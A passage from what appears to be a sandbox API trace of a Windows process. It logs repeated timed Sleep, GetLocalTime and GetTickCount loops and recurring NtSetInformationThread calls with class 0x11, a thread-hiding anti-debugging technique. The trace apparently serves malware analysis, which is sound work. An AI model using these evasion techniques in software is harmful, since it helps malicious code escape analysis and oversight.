wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xb, wSecond=0x23, wMilliseconds=0xd9)) [0193.123] Sleep (dwMilliseconds=0x3e8) [0194.235] Sleep (dwMilliseconds=0x3e8) [0195.389] GetLocalTime (in: lpSystemTime=0x2e8fbbc | out: lpSystemTime=0x2e8fbbc*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xb, wSecond=0x25, wMilliseconds=0x1c0)) [0195.389] Sleep (dwMilliseconds=0x3e8) [0196.512] Sleep (dwMilliseconds=0x3e8) [0197.630] GetLocalTime (in: lpSystemTime=0x2e8fbbc | out: lpSystemTime=0x2e8fbbc*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xb, wSecond=0x27, wMilliseconds=0x2b6)) [0197.630] Sleep (dwMilliseconds=0x3e8) [0198.731] Sleep (dwMilliseconds=0x3e8) [0199.744] GetLocalTime (in: lpSystemTime=0x2e8fbbc | out: lpSystemTime=0x2e8fbbc*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xb, wSecond=0x29, wMilliseconds=0x330)) [0199.744] Sleep (dwMilliseconds=0x3e8) [0200.791] Sleep (dwMilliseconds=0x3e8) [0201.860] GetLocalTime (in: lpSystemTime=0x2e8fbbc | out: lpSystemTime=0x2e8fbbc*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xb, wSecond=0x2b, wMilliseconds=0x38a)) [0201.860] Sleep (dwMilliseconds=0x3e8) [0202.986] Sleep (dwMilliseconds=0x3e8) [0204.089] GetLocalTime (in: lpSystemTime=0x2e8fbbc | out: lpSystemTime=0x2e8fbbc*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xb, wSecond=0x2e, wMilliseconds=0x4b)) [0204.089] Sleep (dwMilliseconds=0x3e8) [0205.136] Sleep (dwMilliseconds=0x3e8) [0206.249] GetLocalTime (in: lpSystemTime=0x2e8fbbc | out: lpSystemTime=0x2e8fbbc*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xb, wSecond=0x30, wMilliseconds=0xe4)) [0206.249] Sleep (dwMilliseconds=0x3e8) [0207.396] Sleep (dwMilliseconds=0x3e8) [0208.447] GetLocalTime (in: lpSystemTime=0x2e8fbbc | out: lpSystemTime=0x2e8fbbc*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xb, wSecond=0x32, wMilliseconds=0x19c)) [0208.447] Sleep (dwMilliseconds=0x3e8) [0209.574] Sleep (dwMilliseconds=0x3e8) [0210.586] GetLocalTime (in: lpSystemTime=0x2e8fbbc | out: lpSystemTime=0x2e8fbbc*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xb, wSecond=0x34, wMilliseconds=0x225)) [0210.586] Sleep (dwMilliseconds=0x3e8) [0211.837] Sleep (dwMilliseconds=0x3e8) [0212.943] GetLocalTime (in: lpSystemTime=0x2e8fbbc | out: lpSystemTime=0x2e8fbbc*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xb, wSecond=0x36, wMilliseconds=0x388)) [0212.943] Sleep (dwMilliseconds=0x3e8) [0214.134] Sleep (dwMilliseconds=0x3e8) [0215.517] GetLocalTime (in: lpSystemTime=0x2e8fbbc | out: lpSystemTime=0x2e8fbbc*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xb, wSecond=0x39, wMilliseconds=0x1cf)) [0215.518] Sleep (dwMilliseconds=0x3e8) Thread: id = 3 os_tid = 0xbe8 [0068.765] SysReAllocStringLen (in: pbstr=0x2fef3c4*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x2fef3c4*="KERNEL32.DLL") returned 1 [0068.765] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0068.765] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0068.768] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0068.769] SysReAllocStringLen (in: pbstr=0x2fef3c4*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x2fef3c4*="KERNEL32.DLL") returned 1 [0068.769] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0068.769] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0068.772] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0068.772] SysReAllocStringLen (in: pbstr=0x2fef3a0*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x2fef3a0*="KERNEL32.DLL") returned 1 [0068.772] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0068.772] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0068.775] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0068.778] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0068.778] GetLocalTime (in: lpSystemTime=0x2fef78c | out: lpSystemTime=0x2fef78c*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xa, wSecond=0x2, wMilliseconds=0x1db)) [0068.778] GetTickCount () returned 0x114b3d5 [0068.778] Sleep (dwMilliseconds=0x3e8) [0071.013] GetLocalTime (in: lpSystemTime=0x2fef78c | out: lpSystemTime=0x2fef78c*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xa, wSecond=0x3, wMilliseconds=0x1e9)) [0071.013] GetTickCount () returned 0x114b7cb [0071.013] Sleep (dwMilliseconds=0x3e8) [0072.028] GetLocalTime (in: lpSystemTime=0x2fef78c | out: lpSystemTime=0x2fef78c*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xa, wSecond=0x4, wMilliseconds=0x1f7)) [0072.028] GetTickCount () returned 0x114bbc1 [0072.028] Sleep (dwMilliseconds=0x3e8) [0073.042] GetLocalTime (in: lpSystemTime=0x2fef78c | out: lpSystemTime=0x2fef78c*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xa, wSecond=0x5, wMilliseconds=0x205)) [0073.042] GetTickCount () returned 0x114bfb7 [0073.042] Sleep (dwMilliseconds=0x3e8) [0074.055] GetLocalTime (in: lpSystemTime=0x2fef78c | out: lpSystemTime=0x2fef78c*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xa, wSecond=0x6, wMilliseconds=0x213)) [0074.056] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0074.540] GetProcAddress (hModule=0x77c40000, lpProcName="NtSetInformationThread") returned 0x77c5f99c [0074.541] GetCurrentThread () returned 0xfffffffe [0074.541] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0074.541] GetTickCount () returned 0x114c591 [0074.541] Sleep (dwMilliseconds=0x3e8) [0075.553] GetLocalTime (in: lpSystemTime=0x2fef78c | out: lpSystemTime=0x2fef78c*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xa, wSecond=0x8, wMilliseconds=0x1d)) [0075.553] GetTickCount () returned 0x114c987 [0075.553] Sleep (dwMilliseconds=0x3e8) [0076.686] GetLocalTime (in: lpSystemTime=0x2fef78c | out: lpSystemTime=0x2fef78c*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xa, wSecond=0x9, wMilliseconds=0x98)) [0076.686] GetTickCount () returned 0x114cdea [0076.686] Sleep (dwMilliseconds=0x3e8) [0077.690] GetLocalTime (in: lpSystemTime=0x2fef78c | out: lpSystemTime=0x2fef78c*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xa, wSecond=0xa, wMilliseconds=0xa6)) [0077.690] GetTickCount () returned 0x114d1e0 [0077.690] Sleep (dwMilliseconds=0x3e8) [0078.704] GetLocalTime (in: lpSystemTime=0x2fef78c | out: lpSystemTime=0x2fef78c*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xa, wSecond=0xb, wMilliseconds=0xb4)) [0078.704] GetTickCount () returned 0x114d5d6 [0078.704] Sleep (dwMilliseconds=0x3e8) [0079.843] GetLocalTime (in: lpSystemTime=0x2fef78c | out: lpSystemTime=0x2fef78c*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xa, wSecond=0xc, wMilliseconds=0xc2)) [0079.843] GetTickCount () returned 0x114d9cc [0079.843] Sleep (dwMilliseconds=0x3e8) [0081.621] GetLocalTime (in: lpSystemTime=0x2fef78c | out: lpSystemTime=0x2fef78c*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xa, wSecond=0xd, wMilliseconds=0xe0)) [0081.621] GetTickCount () returned 0x114ddd2 [0081.621] Sleep (dwMilliseconds=0x3e8) [0092.840] GetLocalTime (in: lpSystemTime=0x2fef78c | out: lpSystemTime=0x2fef78c*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xa, wSecond=0xe, wMilliseconds=0xee)) [0092.841] GetTickCount () returned 0x114e1c8 [0092.841] Sleep (dwMilliseconds=0x3e8) [0093.852] GetLocalTime (in: lpSystemTime=0x2fef78c | out: lpSystemTime=0x2fef78c*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xa, wSecond=0xf, wMilliseconds=0xfc)) [0093.852] GetTickCount () returned 0x114e5be [0093.852] Sleep (dwMilliseconds=0x3e8) [0094.866] GetLocalTime (in: lpSystemTime=0x2fef78c | out: lpSystemTime=0x2fef78c*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xa, wSecond=0x10, wMilliseconds=0x10a)) [0094.866] GetTickCount () returned 0x114e9b4 [0094.866] Sleep (dwMilliseconds=0x3e8) [0095.884] GetLocalTime (in: lpSystemTime=0x2fef78c | out: lpSystemTime=0x2fef78c*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xa, wSecond=0x11, wMilliseconds=0x118)) [0095.885] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0095.885] GetProcAddress (hModule=0x77c40000, lpProcName="NtSetInformationThread") returned 0x77c5f99c [0095.886] GetCurrentThread () returned 0xfffffffe [0095.886] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0095.886] GetTickCount () returned 0x114edaa [0095.886] Sleep (dwMilliseconds=0x3e8) [0096.894] GetLocalTime (in: lpSystemTime=0x2fef78c | out: lpSystemTime=0x2fef78c*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xa, wSecond=0x12, wMilliseconds=0x126)) [0096.894] GetTickCount () returned 0x114f1a0 [0096.894] Sleep (dwMilliseconds=0x3e8) [0097.908] GetLocalTime (in: lpSystemTime=0x2fef78c | out: lpSystemTime=0x2fef78c*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xa, wSecond=0x13, wMilliseconds=0x134)) [0097.908] GetTickCount () returned 0x114f596 [0097.908] Sleep (dwMilliseconds=0x3e8) [0098.922] GetLocalTime (in: lpSystemTime=0x2fef78c | out: lpSystemTime=0x2fef78c*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xa, wSecond=0x14, wMilliseconds=0x142)) [0098.922] GetTickCount () returned 0x114f98c [0098.922] Sleep (dwMilliseconds=0x3e8) [0099.936] GetLocalTime (in: lpSystemTime=0x2fef78c | out: lpSystemTime=0x2fef78c*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xa, wSecond=0x15, wMilliseconds=0x150)) [0099.936] GetTickCount () returned 0x114fd82 [0099.936] Sleep (dwMilliseconds=0x3e8) [0100.949] GetLocalTime (in: lpSystemTime=0x2fef78c | out: lpSystemTime=0x2fef78c*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xa, wSecond=0x16, wMilliseconds=0x15e)) [0100.950] GetTickCount () returned 0x1150178 [0100.950] Sleep (dwMilliseconds=0x3e8) [0101.965] GetLocalTime (in: lpSystemTime=0x2fef78c | out: lpSystemTime=0x2fef78c*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xa, wSecond=0x17, wMilliseconds=0x16c)) [0101.965] GetTickCount () returned 0x115056e [0101.965] Sleep (dwMilliseconds=0x3e8) [0102.977] GetLocalTime (in: lpSystemTime=0x2fef78c | out: lpSystemTime=0x2fef78c*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xa, wSecond=0x18, wMilliseconds=0x17a)) [0102.977] GetTickCount () returned 0x1150964 [0102.977] Sleep (dwMilliseconds=0x3e8) [0104.007] GetLocalTime (in: lpSystemTime=0x2fef78c | out: lpSystemTime=0x2fef78c*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xa, wSecond=0x19, wMilliseconds=0x197)) [0104.007] GetTickCount () returned 0x1150d69 [0104.007] Sleep (dwMilliseconds=0x3e8) [0105.037] GetLocalTime (in: lpSystemTime=0x2fef78c | out: lpSystemTime=0x2fef78c*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xa, wSecond=0x1a, wMilliseconds=0x1b5)) [0105.037] GetTickCount () returned 0x115116f [0105.037] Sleep (dwMilliseconds=0x3e8) [0106.067] GetLocalTime (in: lpSystemTime=0x2fef78c | out: lpSystemTime=0x2fef78c*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xa, wSecond=0x1b, wMilliseconds=0x1d2)) [0106.067] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0106.067] GetProcAddress (hModule=0x77c40000, lpProcName="NtSetInformationThread") returned 0x77c5f99c [0106.068] GetCurrentThread () returned 0xfffffffe [0106.068] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0106.068] GetTickCount () returned 0x1151575 [0106.068] Sleep (dwMilliseconds=0x3e8) [0107.100] GetLocalTime (in: lpSystemTime=0x2fef78c | out: lpSystemTime=0x2fef78c*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xa, wSecond=0x1c, wMilliseconds=0x1f0)) [0107.100] GetTickCount () returned 0x115197a [0107.100] Sleep (dwMilliseconds=0x3e8) [0108.998] GetLocalTime (in: lpSystemTime=0x2fef78c | out: lpSystemTime=0x2fef78c*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xa, wSecond=0x1d, wMilliseconds=0x1fe)) [0108.998] GetTickCount () returned 0x1151d70 [0108.998] Sleep (dwMilliseconds=0x3e8) [0112.354] GetLocalTime (in: lpSystemTime=0x2fef78c | out: lpSystemTime=0x2fef78c*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xa, wSecond=0x1e, wMilliseconds=0x20c)) [0112.354] GetTickCount () returned 0x1152166 [0112.354] Sleep (dwMilliseconds=0x3e8) [0113.999] GetLocalTime (in: lpSystemTime=0x2fef78c | out: lpSystemTime=0x2fef78c*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xa, wSecond=0x1f, wMilliseconds=0x21a)) [0113.999] GetTickCount () returned 0x115255c [0114.000] Sleep (dwMilliseconds=0x3e8) [0115.114] GetLocalTime (in: lpSystemTime=0x2fef78c | out: lpSystemTime=0x2fef78c*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xa, wSecond=0x20, wMilliseconds=0x228)) [0115.114] GetTickCount () returned 0x1152952 [0115.114] Sleep (dwMilliseconds=0x3e8) [0116.460] GetLocalTime (in: lpSystemTime=0x2fef78c | out: lpSystemTime=0x2fef78c*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xa, wSecond=0x21, wMilliseconds=0x236)) [0116.460] GetTickCount () returned 0x1152d48 [0116.460] Sleep (dwMilliseconds=0x3e8) [0118.591] GetLocalTime (in: lpSystemTime=0x2fef78c | out: lpSystemTime=0x2fef78c*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xa, wSecond=0x22, wMilliseconds=0x254)) [0118.591] GetTickCount () returned 0x115314e [0118.591] Sleep (dwMilliseconds=0x3e8) [0120.661] GetLocalTime (in: lpSystemTime=0x2fef78c | out: lpSystemTime=0x2fef78c*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xa, wSecond=0x23, wMilliseconds=0x262)) [0120.661] GetTickCount () returned 0x1153544 [0120.661] Sleep (dwMilliseconds=0x3e8) [0121.772] GetLocalTime (in: lpSystemTime=0x2fef78c | out: lpSystemTime=0x2fef78c*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xa, wSecond=0x24, wMilliseconds=0x2ae)) [0121.773] GetTickCount () returned 0x1153978 [0121.773] Sleep (dwMilliseconds=0x3e8) [0122.835] GetLocalTime (in: lpSystemTime=0x2fef78c | out: lpSystemTime=0x2fef78c*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xa, wSecond=0x25, wMilliseconds=0x2eb)) [0122.835] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0122.836] GetProcAddress (hModule=0x77c40000, lpProcName="NtSetInformationThread") returned 0x77c5f99c [0122.836] GetCurrentThread () returned 0xfffffffe [0122.836] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0122.836] GetTickCount () returned 0x1153d9d [0122.836] Sleep (dwMilliseconds=0x3e8) [0124.726] GetLocalTime (in: lpSystemTime=0x2fef78c | out: lpSystemTime=0x2fef78c*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xa, wSecond=0x27, wMilliseconds=0x2a)) [0124.726] GetTickCount () returned 0x11542ac [0124.726] Sleep (dwMilliseconds=0x3e8) [0126.208] GetLocalTime (in: lpSystemTime=0x2fef78c | out: lpSystemTime=0x2fef78c*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xa, wSecond=0x28, wMilliseconds=0x38)) [0126.208] GetTickCount () returned 0x11546a2 [0126.208] Sleep (dwMilliseconds=0x3e8) [0130.235] GetLocalTime (in: lpSystemTime=0x2fef78c | out: lpSystemTime=0x2fef78c*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xa, wSecond=0x29, wMilliseconds=0x1bc)) [0130.235] GetTickCount () returned 0x1154c0e [0130.235] Sleep (dwMilliseconds=0x3e8) [0132.028] GetLocalTime (in: lpSystemTime=0x2fef78c | out: lpSystemTime=0x2fef78c*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xa, wSecond=0x2a, wMilliseconds=0x312)) [0132.028] GetTickCount () returned 0x115514c [0132.028] Sleep (dwMilliseconds=0x3e8) [0133.039] GetLocalTime (in: lpSystemTime=0x2fef78c | out: lpSystemTime=0x2fef78c*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xa, wSecond=0x2b, wMilliseconds=0x320)) [0133.039] GetTickCount () returned 0x1155542 [0133.039] Sleep (dwMilliseconds=0x3e8) [0135.097] GetLocalTime (in: lpSystemTime=0x2fef78c | out: lpSystemTime=0x2fef78c*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xa, wSecond=0x2d, wMilliseconds=0x1c5)) [0135.097] GetTickCount () returned 0x1155bb7 [0135.098] Sleep (dwMilliseconds=0x3e8) [0136.958] GetLocalTime (in: lpSystemTime=0x2fef78c | out: lpSystemTime=0x2fef78c*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xa, wSecond=0x2f, wMilliseconds=0xe8)) [0136.958] GetTickCount () returned 0x11562aa [0136.958] Sleep (dwMilliseconds=0x3e8) [0138.396] GetLocalTime (in: lpSystemTime=0x2fef78c | out: lpSystemTime=0x2fef78c*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xa, wSecond=0x30, wMilliseconds=0x134)) [0138.396] GetTickCount () returned 0x11566de [0138.396] Sleep (dwMilliseconds=0x3e8) [0139.530] GetLocalTime (in: lpSystemTime=0x2fef78c | out: lpSystemTime=0x2fef78c*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xa, wSecond=0x31, wMilliseconds=0x161)) [0139.530] GetTickCount () returned 0x1156af3 [0139.530] Sleep (dwMilliseconds=0x3e8) [0141.414] GetLocalTime (in: lpSystemTime=0x2fef78c | out: lpSystemTime=0x2fef78c*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xa, wSecond=0x33, wMilliseconds=0x26)) [0141.415] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0141.415] GetProcAddress (hModule=0x77c40000, lpProcName="NtSetInformationThread") returned 0x77c5f99c [0141.415] GetCurrentThread () returned 0xfffffffe [0141.415] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0141.416] GetTickCount () returned 0x1157198 [0141.416] Sleep (dwMilliseconds=0x3e8) [0143.355] GetLocalTime (in: lpSystemTime=0x2fef78c | out: lpSystemTime=0x2fef78c*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xa, wSecond=0x34, wMilliseconds=0x350)) [0143.355] GetTickCount () returned 0x115789a [0143.355] Sleep (dwMilliseconds=0x3e8) [0144.828] GetLocalTime (in: lpSystemTime=0x2fef78c | out: lpSystemTime=0x2fef78c*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xa, wSecond=0x36, wMilliseconds=0x9e)) [0144.828] GetTickCount () returned 0x1157db8 [0144.828] Sleep (dwMilliseconds=0x3e8) [0146.650] GetLocalTime (in: lpSystemTime=0x2fef78c | out: lpSystemTime=0x2fef78c*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xa, wSecond=0x37, wMilliseconds=0x29f)) [0146.650] GetTickCount () returned 0x11583a1 [0146.650] Sleep (dwMilliseconds=0x3e8) [0148.025] GetLocalTime (in: lpSystemTime=0x2fef78c | out: lpSystemTime=0x2fef78c*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xa, wSecond=0x38, wMilliseconds=0x359)) [0148.025] GetTickCount () returned 0x1158843 [0148.025] Sleep (dwMilliseconds=0x3e8) [0149.311] GetLocalTime (in: lpSystemTime=0x2fef78c | out: lpSystemTime=0x2fef78c*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xa, wSecond=0x3a, wMilliseconds=0x98)) [0149.311] GetTickCount () returned 0x1158d52 [0149.312] Sleep (dwMilliseconds=0x3e8) [0150.651] GetLocalTime (in: lpSystemTime=0x2fef78c | out: lpSystemTime=0x2fef78c*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xa, wSecond=0x3b, wMilliseconds=0x1ed)) [0150.651] GetTickCount () returned 0x1159290 [0150.651] Sleep (dwMilliseconds=0x3e8) [0152.221] GetLocalTime (in: lpSystemTime=0x2fef78c | out: lpSystemTime=0x2fef78c*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xb, wSecond=0x1, wMilliseconds=0x35)) [0152.221] GetTickCount () returned 0x11598a8 [0152.221] Sleep (dwMilliseconds=0x3e8) [0153.517] GetLocalTime (in: lpSystemTime=0x2fef78c | out: lpSystemTime=0x2fef78c*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xb, wSecond=0x2, wMilliseconds=0xd0)) [0153.517] GetTickCount () returned 0x1159d2a [0153.517] Sleep (dwMilliseconds=0x3e8) [0154.994] GetLocalTime (in: lpSystemTime=0x2fef78c | out: lpSystemTime=0x2fef78c*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xb, wSecond=0x3, wMilliseconds=0x189)) [0154.994] GetTickCount () returned 0x115a1cc [0154.994] Sleep (dwMilliseconds=0x3e8) [0156.300] GetLocalTime (in: lpSystemTime=0x2fef78c | out: lpSystemTime=0x2fef78c*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xb, wSecond=0x4, wMilliseconds=0x2c0)) [0156.301] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0156.301] GetProcAddress (hModule=0x77c40000, lpProcName="NtSetInformationThread") returned 0x77c5f99c [0156.302] GetCurrentThread () returned 0xfffffffe [0156.302] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0156.302] GetTickCount () returned 0x115a6ea [0156.302] Sleep (dwMilliseconds=0x3e8) [0157.582] GetLocalTime (in: lpSystemTime=0x2fef78c | out: lpSystemTime=0x2fef78c*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xb, wSecond=0x5, wMilliseconds=0x398)) [0157.582] GetTickCount () returned 0x115abab [0157.582] Sleep (dwMilliseconds=0x3e8) [0159.294] GetLocalTime (in: lpSystemTime=0x2fef78c | out: lpSystemTime=0x2fef78c*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xb, wSecond=0x7, wMilliseconds=0xa8)) [0159.294] GetTickCount () returned 0x115b08b [0159.294] Sleep (dwMilliseconds=0x3e8) [0160.763] GetLocalTime (in: lpSystemTime=0x2fef78c | out: lpSystemTime=0x2fef78c*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xb, wSecond=0x8, wMilliseconds=0x20e)) [0160.763] GetTickCount () returned 0x115b5d8 [0160.763] Sleep (dwMilliseconds=0x3e8) [0162.150] GetLocalTime (in: lpSystemTime=0x2fef78c | out: lpSystemTime=0x2fef78c*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xb, wSecond=0x9, wMilliseconds=0x2f6)) [0162.150] GetTickCount () returned 0x115baa8 [0162.150] Sleep (dwMilliseconds=0x3e8) [0164.005] GetLocalTime (in: lpSystemTime=0x2fef78c | out: lpSystemTime=0x2fef78c*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xb, wSecond=0xa, wMilliseconds=0x381)) [0164.005] GetTickCount () returned 0x115bf1b [0164.005] Sleep (dwMilliseconds=0x3e8) [0166.342] GetLocalTime (in: lpSystemTime=0x2fef78c | out: lpSystemTime=0x2fef78c*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xb, wSecond=0xc, wMilliseconds=0x13c)) [0166.342] GetTickCount () returned 0x115c4a7 [0166.342] Sleep (dwMilliseconds=0x3e8) [0167.578] GetLocalTime (in: lpSystemTime=0x2fef78c | out: lpSystemTime=0x2fef78c*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, 